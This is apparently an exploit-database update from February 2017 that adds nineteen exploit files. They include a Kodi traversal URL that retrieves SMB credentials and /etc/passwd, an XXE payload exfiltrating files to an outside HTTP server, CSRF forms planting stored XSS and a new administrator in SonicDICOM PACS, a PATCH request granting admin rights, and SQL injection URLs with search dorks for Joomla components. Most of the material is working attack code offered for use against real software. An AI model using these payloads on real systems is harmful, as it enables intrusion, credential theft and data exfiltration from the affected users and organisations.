DB: 2017-02-13

19 new exploits

Cimetrics BACstac 6.2f - Privilege Escalation
Cimetrics BACnet Explorer 4.0 - XML External Entity Injection
SonicDICOM PACS 2.3.2 - Cross-Site Scripting
SonicDICOM PACS 2.3.2 - Cross-Site Request Forgery (Add Admin)
SonicDICOM PACS 2.3.2 - Privilege Escalation
Kodi 17.1 - Arbitrary File Disclosure
WhizBiz 1.9 - SQL Injection
TI Online Examination System 2.0 - SQL Injection
Viavi Real Estate - SQL Injection
Viavi Movie Review - 'id' Parameter SQL Injection
Viavi Product Review - 'id' Parameter SQL Injection
Quadz School Management System 3.1 - 'uisd' Parameter SQL Injection
Domains & Hostings Manager PRO 3.0 - 'entries' Parameter SQL Injection
Joomla! Component onisPetitions 2.5 - 'tag' Parameter SQL Injection
Joomla! Component onisQuotes 2.5 - 'tag' Parameter SQL Injection
Joomla! Component onisMusic 2 - 'tag' Parameter SQL Injection
Joomla! Component Sponsor Wall 7.0 - 'wallid' Parameter SQL Injection
Joomla! Component Vik Booking 1.7 - SQL Injection
Joomla! Component Soccer Bet 4.1.5 - 'cat' Parameter SQL Injection

files.csv

@@ -8790,6 +8790,8 @@ id,file,description,date,author,platform,type,port
 41221,platforms/windows/local/41221.txt,"Ghostscript 9.20 - 'Filename' Command Execution",2017-02-02,hyp3rlinx,windows,local,0
 41240,platforms/linux/local/41240.sh,"ntfs-3g (Debian 9) - Privilege Escalation",2017-02-03,"Kristian Erik Hermansen",linux,local,0
 41265,platforms/windows/local/41265.py,"IVPN Client 2.6.1 - Privilege Escalation",2017-02-06,"Kacper Szurek",windows,local,0
+41320,platforms/windows/local/41320.txt,"Cimetrics BACstac 6.2f - Privilege Escalation",2017-02-12,LiquidWorm,windows,local,0
+41321,platforms/windows/local/41321.txt,"Cimetrics BACnet Explorer 4.0 - XML External Entity Injection",2017-02-12,LiquidWorm,windows,local,0
 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@@ -37228,3 +37230,20 @@ id,file,description,date,author,platform,type,port
 41299,platforms/hardware/webapps/41299.html,"D-link DIR-600M - Cross-Site Request Forgery",2017-02-10,"Ajay S. Kulal",hardware,webapps,0
 41307,platforms/php/webapps/41307.txt,"HotelCMS with Booking Engine - SQL Injection",2017-02-10,"Ihsan Sencan",php,webapps,0
 41308,platforms/php/webapps/41308.txt,"WordPress 4.7.0/4.7.1 Plugin Insert PHP - PHP Code Injection",2017-02-09,CrashBandicot,php,webapps,0
+41309,platforms/windows/webapps/41309.html,"SonicDICOM PACS 2.3.2 - Cross-Site Scripting",2017-02-11,LiquidWorm,windows,webapps,0
+41310,platforms/windows/webapps/41310.html,"SonicDICOM PACS 2.3.2 - Cross-Site Request Forgery (Add Admin)",2017-02-11,LiquidWorm,windows,webapps,0
+41311,platforms/windows/webapps/41311.txt,"SonicDICOM PACS 2.3.2 - Privilege Escalation",2017-02-11,LiquidWorm,windows,webapps,0
+41312,platforms/linux/webapps/41312.txt,"Kodi 17.1 - Arbitrary File Disclosure",2017-02-12,"Eric Flokstra",linux,webapps,0
+41313,platforms/php/webapps/41313.txt,"WhizBiz 1.9 - SQL Injection",2017-02-12,"Ihsan Sencan",php,webapps,0
+41314,platforms/php/webapps/41314.txt,"TI Online Examination System 2.0 - SQL Injection",2017-02-12,"Ihsan Sencan",php,webapps,0
+41315,platforms/php/webapps/41315.txt,"Viavi Real Estate - SQL Injection",2017-02-12,"Ihsan Sencan",php,webapps,0
+41316,platforms/php/webapps/41316.txt,"Viavi Movie Review - 'id' Parameter SQL Injection",2017-02-12,"Ihsan Sencan",php,webapps,0
+41317,platforms/php/webapps/41317.txt,"Viavi Product Review - 'id' Parameter SQL Injection",2017-02-12,"Ihsan Sencan",php,webapps,0
+41318,platforms/php/webapps/41318.txt,"Quadz School Management System 3.1 - 'uisd' Parameter SQL Injection",2017-02-12,"Ihsan Sencan",php,webapps,0
+41319,platforms/php/webapps/41319.txt,"Domains & Hostings Manager PRO 3.0 - 'entries' Parameter SQL Injection",2017-02-12,"Ihsan Sencan",php,webapps,0
+41322,platforms/php/webapps/41322.txt,"Joomla! Component onisPetitions 2.5 - 'tag' Parameter SQL Injection",2017-02-11,"Persian Hack Team",php,webapps,0
+41323,platforms/php/webapps/41323.txt,"Joomla! Component onisQuotes 2.5 - 'tag' Parameter SQL Injection",2017-02-11,"Persian Hack Team",php,webapps,0
+41324,platforms/php/webapps/41324.txt,"Joomla! Component onisMusic 2 - 'tag' Parameter SQL Injection",2017-02-11,"Persian Hack Team",php,webapps,0
+41325,platforms/php/webapps/41325.txt,"Joomla! Component Sponsor Wall 7.0 - 'wallid' Parameter SQL Injection",2017-02-11,"Persian Hack Team",php,webapps,0
+41326,platforms/php/webapps/41326.txt,"Joomla! Component Vik Booking 1.7 - SQL Injection",2017-02-11,"Persian Hack Team",php,webapps,0
+41327,platforms/php/webapps/41327.txt,"Joomla! Component Soccer Bet 4.1.5 - 'cat' Parameter SQL Injection",2017-02-11,"Persian Hack Team",php,webapps,0

platforms/linux/webapps/41312.txt

@@ -0,0 +1,54 @@
+# Exploit Title: Kodi - Local File Inclusion
+# Date: 12 February 2017
+# Exploit Author: Eric Flokstra
+# Vendor Homepage: https://kodi.tv/
+# Software Link: https://kodi.tv/download/
+# Version: Kodi version 17.1 (Krypton), Chorus version 2.4.2
+# Tested on: Linux
+
+Kodi (formerly XBMC) is a free and open-source media player software
+application developed by the XBMC Foundation. Chorus is a web interface
+for controlling and interacting with Kodi. It is hosted by the Kodi
+installation.
+
+The web interface loads a thumbnail of an image, video or add-on when
+selecting a category in the left menu with the following request:
+
+http://192.168.1.25:8080/image/image%3A%2F%2F%252fhome%252fosmc%252f.kodi%252faddons%252fplugin.video.vice%252ficon.png%2F
+
+Insufficient validation of user input is performed on this URL resulting
+in a local file inclusion vulnerability. This enables attackers
+to retrieve arbitrary files from the filesystem by changing the location
+after the '/image/image%3A%2F%2F’ part.
+
+<--Examples-->
+
+1) If Kodi is connected to a NAS the following request can be used to obtain plain text SMB credentials:
+
+http://192.168.1.25:8080/image/image%3A%2F%2F%2e%2e%252fhome%252fosmc%252f.kodi%252fuserdata%252fpasswords.xml
+
+Response:
+
+<passwords><path><from pathversion="1">smb://192.168.1.15/</from><to
+pathversion="1">smb://username:password@192.168.1.15//share</to></path></passwords>
+
+2) Request to retrieve the content of /etc/passwd:
+
+http://192.168.1.25:8080/image/image%3A%2F%2F%2e%2e%252fetc%252fpasswd
+
+Response:
+
+root:x:0:0:root:/root:/bin/bash
+daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+bin:x:2:2:bin:/bin:/usr/sbin/nologin
+sys:x:3:3:sys:/dev:/usr/sbin/nologin
+sync:x:4:65534:sync:/bin:/bin/sync
+games:x:5:60:games:/usr/games:/usr/sbin/nologin
+man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
+lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
+mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
+news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
+uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
+proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
+www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
+...

platforms/php/webapps/41313.txt

@@ -0,0 +1,17 @@
+# # # # # 
+# Exploit Title: WhizBiz - Business Directory CMS v1.9 - SQL Injection
+# Google Dork: N/A
+# Date: 12.02.2017
+# Vendor Homepage: http://webhelios.com/
+# Software Buy: https://codecanyon.net/item/whizbiz-business-directory-cms/12931569
+# Demo: http://whizbiz.webhelios.com/
+# Version: N/A
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/index.php/en/results/plainkey=[SQL]
+# # # # #

platforms/php/webapps/41314.txt

@@ -0,0 +1,22 @@
+# # # # # 
+# Exploit Title: TI Online Examination System v2.0 - SQL Injection
+# Google Dork: N/A
+# Date: 12.02.2017
+# Vendor Homepage: http://textusintentio.com/
+# Software Buy: https://codecanyon.net/item/ti-online-examination-system-v2/11248904
+# Demo: http://oesv2.textusintentio.com/
+# Version: 2.0
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# Login as student user
+# http://localhost/[PATH]/center/exam_edit.php?p_e_id=[SQL]
+# http://localhost/[PATH]/center/student_edit.php?s_id=[SQL]
+# http://localhost/[PATH]/center/edit_notice.php?n_id=[SQL]
+# http://localhost/[PATH]/center/exam_edit.php?p_e_id=[SQL]
+# Etc..
+# # # # #

platforms/php/webapps/41315.txt

@@ -0,0 +1,19 @@
+# # # # # 
+# Exploit Title: Viavi Real Estate - SQL Injection
+# Google Dork: N/A
+# Date: 12.02.2017
+# Vendor Homepage: http://viavilab.com/
+# Software Buy: https://codecanyon.net/item/viavi-real-estate/11217313
+# Demo: http://viavilab.com/codecanyon/real_estate_demo/
+# Version: N/A
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/property-detail.php?pid=[SQL]
+# http://localhost/[PATH]/buysalerent.php?sort=[SQL]
+# Etc..
+# # # # #

platforms/php/webapps/41316.txt

@@ -0,0 +1,18 @@
+# # # # # 
+# Exploit Title: Viavi Movie Review - SQL Injection
+# Google Dork: N/A
+# Date: 12.02.2017
+# Vendor Homepage: http://viavilab.com/
+# Software Buy: https://codecanyon.net/item/movie-review/12729570
+# Demo: http://viavilab.com/codecanyon/movie_review_demo/
+# Version: N/A
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/genres.php?id=[SQL]
+# Etc..
+# # # # #

platforms/php/webapps/41317.txt

@@ -0,0 +1,18 @@
+# # # # # 
+# Exploit Title: Viavi Product Review - SQL Injection
+# Google Dork: N/A
+# Date: 12.02.2017
+# Vendor Homepage: http://viavilab.com/
+# Software Buy: https://codecanyon.net/item/product-review/12406163
+# Demo: http://viavilab.com/codecanyon/product_review_demo/
+# Version: N/A
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/category.php?id=[SQL]
+# Etc..
+# # # # #

platforms/php/webapps/41318.txt

@@ -0,0 +1,19 @@
+# # # # # 
+# Exploit Title: Quadz School Management System v3.1 - SQL Injection
+# Google Dork: N/A
+# Date: 12.02.2017
+# Vendor Homepage: http://awardcorporation.com/
+# Software Buy: https://codecanyon.net/item/quadz-school-management-system/10452009
+# Demo: http://mass.awardcorporation.com/
+# Version: 3.1
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# Login as student user
+# http://localhost/[PATH]/index.php/sclass/ownClassRoutin?uisd=[SQL]
+# http://localhost/[PATH]/index.php/suggestion/own_suggestion?uisd=[SQL]
+# # # # #

platforms/php/webapps/41319.txt

@@ -0,0 +1,19 @@
+# # # # # 
+# Exploit Title: Domains & Hostings Manager PRO v 3.0 - SQL Injection
+# Google Dork: N/A
+# Date: 12.02.2017
+# Vendor Homepage: http://endavi.com/
+# Software Buy: https://codecanyon.net/item/advanced-domains-and-hostings-pro-v3-multiuser/10368735
+# Demo: http://endavi.com/dhrpro_demo/
+# Version: 3.0
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# Login as regular user
+# http://localhost/[PATH]/list.php?entries=[SQL]
+# http://localhost/[PATH]/edit.php?entries=[SQL]
+# # # # #

platforms/php/webapps/41322.txt

@@ -0,0 +1,16 @@
+# Exploit Title: Joomla Component onisPetitions 2.5 - SQL Injection
+# Date: 2017-02-11
+# Home : https://extensions.joomla.org/extensions/extension/contacts-and-feedback/polls/onispetitions/
+# Exploit Author: Persian Hack Team
+# Discovered by : Mojtaba MobhaM (kazemimojtaba@live.com)
+# Home : http://persian-team.ir/
+# Telegram Channel AND Demo: @PersianHackTeam
+# Tested on: Linux
+
+# POC :
+# tag Parameter Vulnerable to SQL Injection
+# http://www.Target.com/index.php?option=com_onispetitions&view=petitions&tag=[SQL]
+
+# Greetz : T3NZOG4N & FireKernel & Milad Hacking And All Persian Hack Team Members
+# Iranian white hat Hackers
+

platforms/php/webapps/41323.txt

@@ -0,0 +1,16 @@
+# Exploit Title: Joomla Component onisQuotes 2.5 - SQL Injection
+# Date: 2017-02-11
+# Home : https://extensions.joomla.org/extensions/extension/news-display/quotes/onisquotes/
+# Exploit Author: Persian Hack Team
+# Discovered by : Mojtaba MobhaM (kazemimojtaba@live.com)
+# Home : http://persian-team.ir/
+# Telegram Channel AND Demo: @PersianHackTeam
+# Tested on: Linux
+
+# POC :
+# tag Parameter Vulnerable to SQL Injection
+# http://www.Target.com/index.php?option=com_onisquotes&view=quotes&tag=[SQL]&Itemid=180
+
+# Greetz : T3NZOG4N & FireKernel & Milad Hacking And All Persian Hack Team Members
+# Iranian white hat Hackers
+

platforms/php/webapps/41324.txt

@@ -0,0 +1,17 @@
+# Exploit Title: Joomla Component onisMusic 2 - SQL Injection
+# Date: 2017-02-11
+# Home : https://extensions.joomla.org/extensions/extension/multimedia/multimedia-players/onismusic/
+# Exploit Author: Persian Hack Team
+# Discovered by : Mojtaba MobhaM (kazemimojtaba@live.com)
+# Home : http://persian-team.ir/
+# Telegram Channel AND Demo: @PersianHackTeam
+# Google Dork : inurl:option=com_onismusic
+# Tested on: Linux
+
+# POC :
+# tag Parameter Vulnerable to SQL Injection
+# http://www.Target.com/index.php?option=com_onismusic&view=songs&tag=[SQL]
+
+# Greetz : T3NZOG4N & FireKernel & Milad Hacking And All Persian Hack Team Members
+# Iranian white hat Hackers
+

platforms/php/webapps/41325.txt

@@ -0,0 +1,17 @@
+# Exploit Title: Joomla Component Sponsor Wall 7.0 - SQL Injection
+# Date: 2017-02-11
+# Home : https://extensions.joomla.org/extensions/extension/ads-a-affiliates/sponsors/sponsor-wall/
+# Exploit Author: Persian Hack Team
+# Discovered by : Mojtaba MobhaM (kazemimojtaba@live.com)
+# Home : http://persian-team.ir/
+# Telegram Channel AND Demo: @PersianHackTeam
+# Google Dork : inurl:index.php?oprion=com_sponsorwall
+# Tested on: Linux
+
+# POC :
+# wallid Parameter Vulnerable to SQL Injection
+# http://www.Target.com/index.php?option=com_sponsorwall&task=click&wallid=[SQL]
+
+# Greetz : T3NZOG4N & FireKernel & Milad Hacking And All Persian Hack Team Members
+# Iranian white hat Hackers
+

platforms/php/webapps/41326.txt

@@ -0,0 +1,17 @@
+# Exploit Title: Joomla Component Vik Booking 1.7 - SQL Injection
+# Date: 2017-02-11
+# Home : https://extensions.joomla.org/extension/vik-booking/
+# Exploit Author: Persian Hack Team
+# Discovered by : Mojtaba MobhaM (kazemimojtaba@live.com)
+# Home : http://persian-team.ir/
+# Telegram Channel AND Demo: @PersianHackTeam
+# Google Dork : inurl:index.php?option=com_vikbooking
+# Tested on: Linux
+
+# POC :
+# room_ids[0] Parameter Vulnerable to SQL Injection
+# http://www.Target.com/index.php?option=com_vikbooking&view=availability&room_ids[0]=[SQL]
+
+# Greetz : T3NZOG4N & FireKernel & Milad Hacking And All Persian Hack Team Members
+# Iranian white hat Hackers
+

platforms/php/webapps/41327.txt

@@ -0,0 +1,17 @@
+# Exploit Title: Joomla Component Soccer Bet 4.1.5 - SQL Injection
+# Date: 2017-02-11
+# Home : https://extensions.joomla.org/extensions/extension/sports-a-games/tips-a-betts/soccer-bet/
+# Exploit Author: Persian Hack Team
+# Discovered by : Mojtaba MobhaM (kazemimojtaba@live.com)
+# Home : http://persian-team.ir/
+# Telegram Channel AND Demo: @PersianHackTeam
+# Google Dork : inurl:index.php?option=com_soccerbet
+# Tested on: Linux
+
+# POC :
+# Cat Parameter Vulnerable to SQL Injection
+# http://www.Target.com/index.php?option=com_soccerbet&view=matches&cat=[SQL]
+
+# Greetz : T3NZOG4N & FireKernel & Milad Hacking And All Persian Hack Team Members
+# Iranian white hat Hackers
+

platforms/windows/local/41320.txt

@@ -0,0 +1,101 @@
+Cimetrics BACstac Routing Service 6.2f Local Privilege Escalation
+
+
+Vendor: Cimetrics, Inc.
+Product web page: https://www.cimetrics.com
+Affected version: 6.2f
+
+Summary: BACstac belongs to product BACstac(TM) Networking Software and
+was developed by company Cimetrics Inc. Cimetrics is excited to announce
+a new version of our industry-leading BACnet protocol stack: BACstac 6.8.
+The Cimetrics BACstac saves man-years of development when your company needs
+to create a BACnet solution ! Our software team has created a set of BACnet
+libraries which greatly simplify the task of interfacing to BACnet.
+
+Even the largest companies in the HVAC industry use our code because it is
+a very complex and time consuming task keeping up with the ongoing changes
+that are taking place in the BACnet committees. For example, many hundreds
+of protocol modifications, requirements, and enhancements have taken place
+in just the past year. By purchasing the Cimetrics BACstac solution, we do
+the compatibility coding and testing. This typically saves man-years of
+software developer time EVERY YEAR !
+
+Desc: The application suffers from an unquoted search path issue impacting
+the service 'bacstac' (bacstac-gtw.exe) for Windows deployed as part of BACstac
+routing service solution. This could potentially allow an authorized but non-privileged
+local user to execute arbitrary code with elevated privileges on the system.
+A successful attempt would require the local user to be able to insert their
+code in the system root path undetected by the OS or other security applications
+where it could potentially be executed during application startup or reboot.
+If successful, the local user’s code would execute with the elevated privileges
+of the application.
+
+BACstac also provides a named pipe used for IPC connection between a BACstac
+application and the BACstac service.
+
+The BACstac Service implements AL multiplexing using a custom IPC mechanism. The
+IPC mechanism was chosen to allow portability to embedded systems, and it uses a
+fixed number of slots. The slots are recycled when an application stops running.
+
+With Object-based multiplexing, Service requests that identify a particular Object
+(e.g. Read-Property) can be forwarded to a dedicated process. A multiplexing server
+using an appropriate IPC mechanism (e.g. CORBA, COM, or UDP) can be built on top of
+the BACstac API.
+
+A number of BACstac protocol stack run-time configuration parameters are stored
+in the Windows Registry. These values are created and initialized when the protocol
+stack is installed. The registry entries are not completely removed when the protocol
+stack is uninstalled (this is standard behaviour for .INF files). The Registry
+entries are located in:
+
+HKEY_LOCAL_MACHINE\SOFTWARE\Cimetrics\BACstac
+HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\BACstac
+
+The BACstac Service parameters (in ..\Services\BACstac) include plenty of keys,
+one of which is the 'Tsml\ConnIpc' key with the default name: \\.\pipe\bacstac.
+
+The vulnerability exist due to the improper permissions, with the 'F' flag (Full)
+for 'Everyone' group.
+
+Tested on: Microsoft Windows 7 Professional SP1 (EN)
+           Microsoft Windows 7 Ultimate SP1 (EN)
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2017-5397
+Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5397.php
+
+
+13.12.2016
+
+--
+
+
+C:\>sc qc bacstac
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: bacstac
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files (x86)\Cimetrics\BACstac v6.2f\bacstac-gtw.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : BACstac Protocol
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
+
+C:\>
+C:\>accesschk.exe \pipe\bacstac
+
+Accesschk v6.02 - Reports effective permissions for securable objects
+Copyright (C) 2006-2016 Mark Russinovich
+Sysinternals - www.sysinternals.com
+
+\\.\Pipe\bacstac
+  RW Everyone
+
+C:\>

platforms/windows/local/41321.txt

@@ -0,0 +1,55 @@
+Cimetrics BACnet Explorer 4.0 XXE Vulnerability
+
+
+Vendor: Cimetrics, Inc.
+Product web page: https://www.cimetrics.com
+Affected version: 4.0.0.0
+
+Summary: The BACnet Explorer is a BACnet client application that
+helps auto discover BACnet devices.
+
+Desc: BACnetExplorer suffers from an XML External Entity (XXE)
+vulnerability using the DTD parameter entities technique resulting
+in disclosure and retrieval of arbitrary data on the affected node
+via out-of-band (OOB) attack. The vulnerability is triggered when
+input passed to the xml parser is not sanitized while parsing the
+xml project file.
+
+Tested on: Microsoft Windows NT 6.1.7601 Service Pack 1
+           mscorlib.dll: 4.0.30319.34209 built by: FX452RTMGDR
+           BACstac Library: 1.5.6116.0
+           BACstac Service: 6.8.3
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2017-5398
+Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5398.php
+
+
+30.01.2017
+
+--
+
+Open file evil.xml:
+
+<?xml version="1.0" encoding="UTF-8" ?>
+<!DOCTYPE zsl [
+<!ENTITY % remote SYSTEM "http://192.168.1.71:8080/xxe.xml">
+%remote;
+%root;
+%oob;]>
+
+
+xxe.xml on the web server:
+
+<!ENTITY % payload SYSTEM "file:///C:/windows/win.ini">
+<!ENTITY % root "<!ENTITY &#37; oob SYSTEM 'http://192.168.1.71:8080/?%payload;'> ">
+
+
+pyhon -m SimpleHTTPServer 8080
+
+lab-PC - - [30/Jan/2017 00:47:44] "GET /?%5BMail%5D%0D%0ACMCDLLNAME32=mapi32.dll%0D%0ACMC=1%0D%0AMAPI=1%0D%0AMAPIX=1%0D%0AMAPIXVER=1.0.0.1%0D%0AOLEMessaging=1 HTTP/1.1" 301 -
+lab-PC - - [30/Jan/2017 00:47:44] "GET /?%5BMail%5D%0D%0ACMCDLLNAME32=mapi32.dll%0D%0ACMC=1%0D%0AMAPI=1%0D%0AMAPIX=1%0D%0AMAPIXVER=1.0.0.1%0D%0AOLEMessaging=1/ HTTP/1.1" 200 -

platforms/windows/webapps/41309.html

@@ -0,0 +1,78 @@
+SonicDICOM PACS 2.3.2 Multiple Stored Cross-Site Scripting Vulnerabilities
+
+
+Vendor: JIUN Corporation
+Product web page: https://www.sonicdicom.com
+Affected version: 2.3.2 and 2.3.1
+
+Summary: SonicDICOM is PACS software that combines the capabilities of
+DICOM Server with web browser based DICOM Viewer.
+
+Desc: The application suffers from multiple stored XSS vulnerabilities.
+Input passed to several API POST parameters is not properly sanitised
+before being returned to the user. This can be exploited to execute
+arbitrary HTML and script code in a user's browser session in context
+of an affected site.
+
+Tested on: Microsoft-HTTPAPI/2.0
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2017-5394
+Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5394.php
+
+22.11.2016
+
+--
+
+
+CSRF Stored XSS via value parameter in settings API:
+----------------------------------------------------
+
+<html>
+  <body>
+    <form action="http://172.19.0.214/viewer/api/settings/add" method="POST">
+      <input type="hidden" name="id" value="testingus" />
+      <input type="hidden" name="key" value="viewer&#46;display&#46;overlay&#46;tl" />
+      <input type="hidden" name="value" value="&#123;"angle"&#58;&#123;"item&#95;name"&#58;"Angle"&#44;"display&#95;name"&#58;"&#92;"><script>alert&#40;1&#41;<&#47;script>"&#125;&#125;" />
+      <input type="submit" value="Request #1" />
+    </form>
+  </body>
+</html>
+
+
+CSRF Stored XSS via Name parameter in sendsettings API:
+-------------------------------------------------------
+
+<html>
+  <body>
+    <form action="http://172.19.0.214/viewer/api/sendsettings/create" method="POST">
+      <input type="hidden" name="Name" value=""><script>prompt&#40;2&#41;<&#47;script>" />
+      <input type="hidden" name="IPAddress" value="1&#46;1&#46;1&#46;1" />
+      <input type="hidden" name="Port" value="123" />
+      <input type="hidden" name="CalledAETitle" value="asd" />
+      <input type="hidden" name="CallingAETitle" value="dsa" />
+      <input type="submit" value="Request #2" />
+    </form>
+  </body>
+</html>
+
+
+CSRF Stored XSS via Name parameter in providers API:
+----------------------------------------------------
+
+<html>
+  <body>
+    <form action="http://172.19.0.214/viewer/api/providers/create" method="POST">
+      <input type="hidden" name="Name" value=""><script>confirm&#40;2&#41;<&#47;script>" />
+      <input type="hidden" name="Port" value="123" />
+      <input type="hidden" name="AETitle" value="ZSL" />
+      <input type="hidden" name="AllowAnonymousUsers" value="true" />
+      <input type="hidden" name="IsAnonymous" value="true" />
+      <input type="submit" value="Request #3" />
+    </form>
+  </body>
+</html>

platforms/windows/webapps/41310.html

@@ -0,0 +1,41 @@
+SonicDICOM PACS 2.3.2 CSRF Add Admin Exploit
+
+
+Vendor: JIUN Corporation
+Product web page: https://www.sonicdicom.com
+Affected version: 2.3.2 and 2.3.1
+
+Summary: SonicDICOM is PACS software that combines the capabilities of
+DICOM Server with web browser based DICOM Viewer.
+
+Desc: The application interface allows users to perform certain actions
+via HTTP requests without performing any validity checks to verify the
+requests. This can be exploited to perform certain actions with administrative
+privileges if a logged-in user visits a malicious web site.
+
+Tested on: Microsoft-HTTPAPI/2.0
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2017-5395
+Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5395.php
+
+22.11.2016
+
+--
+
+
+<html>
+  <body>
+    <form action="http://172.19.0.214/viewer/api/accounts/create" method="POST">
+      <input type="hidden" name="Id" value="testingus" />
+      <input type="hidden" name="Name" value="Second Admin" />
+      <input type="hidden" name="Authority" value=“1” />
+      <input type="hidden" name="Password" value="654321" />
+      <input type="submit" value="Request" />
+    </form>
+  </body>
+</html>

platforms/windows/webapps/41311.txt

@@ -0,0 +1,42 @@
+SonicDICOM PACS 2.3.2 Remote Vertical Privilege Escalation Exploit
+
+
+Vendor: JIUN Corporation
+Product web page: https://www.sonicdicom.com
+Affected version: 2.3.2 and 2.3.1
+
+Summary: SonicDICOM is PACS software that combines the capabilities of
+DICOM Server with web browser based DICOM Viewer.
+
+Desc: The application suffers from a privilege escalation vulnerability.
+Normal user can elevate his/her privileges by sending a HTTP PATCH request
+seting the parameter 'Authority' to integer value '1' gaining admin rights.
+
+Tested on: Microsoft-HTTPAPI/2.0
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2017-5396
+Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5396.php
+
+22.11.2016
+
+--
+
+PATCH /viewer/api/accounts/update HTTP/1.1
+Host: 172.19.0.214
+Content-Length: 37
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+User-Agent: Escalation Browser/1.0
+Content-Type: application/x-www-form-urlencoded
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.8
+Cookie: {REMOVED_FOR_BREVITY}
+Connection: close
+
+Id=testingus&Name=peend&Authority=1